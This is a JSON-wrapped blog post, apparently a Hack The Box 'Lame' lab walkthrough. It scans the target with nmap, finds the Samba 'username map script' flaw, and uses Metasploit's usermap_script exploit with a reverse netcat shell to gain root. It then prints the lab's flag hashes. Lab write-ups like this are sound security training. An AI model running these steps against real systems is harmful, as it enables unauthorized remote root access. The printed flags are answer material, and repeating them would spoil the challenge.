{"id":3704,"date":"2020-08-02T22:03:28","date_gmt":"2020-08-02T13:03:28","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3704"},"modified":"2020-08-30T23:37:21","modified_gmt":"2020-08-30T14:37:21","slug":"hack-the-box-lake-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3704","title":{"rendered":"Hack The Box &#8211; Lame &#8211; Walkthrough"},"content":{"rendered":"<h3>Confirm that Samba is running<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 lame.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 08:55 UTC\r\nNmap scan report for lame.htb (10.10.10.3)\r\nHost is up (0.047s latency).\r\nNot shown: 96 filtered ports\r\nPORT    STATE SERVICE     VERSION\r\n21\/tcp  open  ftp         vsftpd 2.3.4\r\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n| ftp-syst:\r\n|   STAT:\r\n| FTP server status:\r\n|      Connected to 10.10.14.8\r\n|      Logged in as ftp\r\n|      TYPE: ASCII\r\n|      No session bandwidth limit\r\n|      Session timeout in seconds is 300\r\n|      Control connection is plain text\r\n|      Data connections will be plain text\r\n|      vsFTPd 2.3.4 - secure, fast, stable\r\n|_End of status\r\n22\/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\r\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\r\n139\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n445\/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\nHost script results:\r\n|_clock-skew: mean: 
2h05m22s, deviation: 2h49m43s, median: 5m21s\r\n| smb-os-discovery:\r\n|   OS: Unix (Samba 3.0.20-Debian)\r\n|   Computer name: lame\r\n|   NetBIOS computer name:\r\n|   Domain name: hackthebox.gr\r\n|   FQDN: lame.hackthebox.gr\r\n|_  System time: 2020-08-02T05:01:18-04:00\r\n| smb-security-mode:\r\n|   account_used: &lt;blank&gt;\r\n|   authentication_level: user\r\n|   challenge_response: supported\r\n|_  message_signing: disabled (dangerous, but default)\r\n|_smb2-time: Protocol negotiation failed (SMB2)\r\n<\/pre>\n<h3>Search for Samba vulnerabilities<\/h3>\n<p>Based on the search results, I decided to try &#8216;Username&#8217; map script&#8217; Command Execution (Metasploit).<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# apt install exploitdb\r\n# searchsploit samba 3.0.20\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                                      |  Path\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nSamba 3.0.10 &lt; 3.3.5 - Format String \/ Security Bypass                                                                                              | multiple\/remote\/10095.txt\r\nSamba 3.0.20 &lt; 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                    | unix\/remote\/16320.rb\r\nSamba &lt; 3.0.20 - Remote Heap Overflow                                                                                                               | linux\/remote\/7701.txt\r\nSamba &lt; 3.0.20 - Remote Heap 
Overflow                                                                                                               | linux\/remote\/7701.txt\r\nSamba &lt; 3.6.2 (x86) - Denial of Service (PoC)                                                                                                       | linux_x86\/dos\/36741.py\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n<\/pre>\n<h3>Running Metasploit<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# apt install metasploit-framework\r\n# \/etc\/init.d\/postgresql start\r\nStarting PostgreSQL 12 database server: main.\r\n \r\nroot@81c581d5cf43:\/# update-rc.d postgresql enable\r\n \r\nroot@81c581d5cf43:\/# msfdb init\r\n...\r\n\r\n# msfconsole\r\n ______________________________________________________________________________\r\n|                                                                              |\r\n|                          3Kom SuperHack II Logon                             |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                                              |\r\n|                                                                              |\r\n|                 User Name:          &#x5B;   security    ]                        |\r\n|                                                                              |\r\n|                 Password:           &#x5B;               ]                        |\r\n|                                                                              |\r\n|                                                                              |\r\n|                                                                           
   |\r\n|                                   &#x5B; OK ]                                     |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                       https:\/\/metasploit.com |\r\n|______________________________________________________________________________|\r\n\r\n\r\n       =&#x5B; metasploit v5.0.100-dev                         ]\r\n+ -- --=&#x5B; 2046 exploits - 1106 auxiliary - 344 post       ]\r\n+ -- --=&#x5B; 562 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=&#x5B; 7 evasion                                       ]\r\n\r\nMetasploit tip: Writing a custom module? After editing your module, why not try the reload command\r\n\r\nmsf5 &gt; search samba\r\n\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                 Disclosure Date  Rank       Check  Description\r\n   -   ----                                                 ---------------  ----       -----  -----------\r\n   0   auxiliary\/admin\/smb\/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal\r\n   1   auxiliary\/dos\/samba\/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow\r\n   2   auxiliary\/dos\/samba\/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow\r\n   3   auxiliary\/dos\/samba\/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow\r\n   4   auxiliary\/scanner\/rsync\/modules_list                                  normal     No     List Rsync Modules\r\n   5   auxiliary\/scanner\/smb\/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State\r\n   6   
exploit\/freebsd\/samba\/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)\r\n   7   exploit\/linux\/samba\/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)\r\n   8   exploit\/linux\/samba\/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load\r\n   9   exploit\/linux\/samba\/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow\r\n   10  exploit\/linux\/samba\/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow\r\n   11  exploit\/linux\/samba\/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)\r\n   12  exploit\/multi\/samba\/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow\r\n   13  exploit\/multi\/samba\/usermap_script                   2007-05-14       excellent  No     Samba &quot;username map script&quot; Command Execution\r\n   14  exploit\/osx\/samba\/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow\r\n   15  exploit\/osx\/samba\/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)\r\n   16  exploit\/solaris\/samba\/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow\r\n   17  exploit\/solaris\/samba\/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)\r\n   18  exploit\/unix\/http\/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection\r\n   19  exploit\/unix\/misc\/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon 
Command Execution\r\n   20  exploit\/unix\/webapp\/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution\r\n   21  exploit\/windows\/fileformat\/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution\r\n   22  exploit\/windows\/http\/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow\r\n   23  exploit\/windows\/license\/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow\r\n   24  exploit\/windows\/smb\/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource\r\n   25  post\/linux\/gather\/enum_configs                                        normal     No     Linux Gather Configurations\r\n\r\nInteract with a module by name or index, for example use 25 or use post\/linux\/gather\/enum_configs\r\n\r\nmsf5 &gt; use exploit\/multi\/samba\/usermap_script\r\n&#x5B;*] No payload configured, defaulting to cmd\/unix\/reverse_netcat\r\nmsf5 exploit(multi\/samba\/usermap_script) &gt; show options\r\n\r\nModule options (exploit\/multi\/samba\/usermap_script):\r\n\r\n   Name    Current Setting  Required  Description\r\n   ----    ---------------  --------  -----------\r\n   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT   139              yes       The target port (TCP)\r\n\r\n\r\nPayload options (cmd\/unix\/reverse_netcat):\r\n\r\n   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST  172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\nmsf5 
exploit(multi\/samba\/usermap_script) &gt; set RHOSTS lame.htb\r\nRHOSTS =&gt; lame.htb\r\nmsf5 exploit(multi\/samba\/usermap_script) &gt; set LHOST\r\nset LHOST\r\nmsf5 exploit(multi\/samba\/usermap_script) &gt; set LHOST 10.10.x.x\r\nLHOST =&gt; 10.10.x.x\r\nmsf5 exploit(multi\/samba\/usermap_script) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\nmsf5 exploit(multi\/samba\/usermap_script) &gt; exploit\r\n&#x5B;-] Handler failed to bind to 10.10.x.x:1234:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] Command shell session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:60758) at 2020-08-02 12:56:28 +0000\r\n\r\nid\r\nuid=0(root) gid=0(root)\r\n\r\ncat \/root\/root.txt\r\n92caac3be140ef409e45721348a4e9df\r\n\r\ncd \/home\r\n\r\nls\r\nftp\r\nmakis\r\nservice\r\nuser\r\ncd makis\r\n\r\ncat \/home\/makis\/user.txt\r\n69454a937d94f5f0225ea00acd2e84c5\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Confirm that Samba is running # nmap -A -n -F -T5 lame.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 08:55 UTC 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3704"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704\/revisions"}],"predecessor-version":[{"id":3793,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704\/revisions\/3793"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}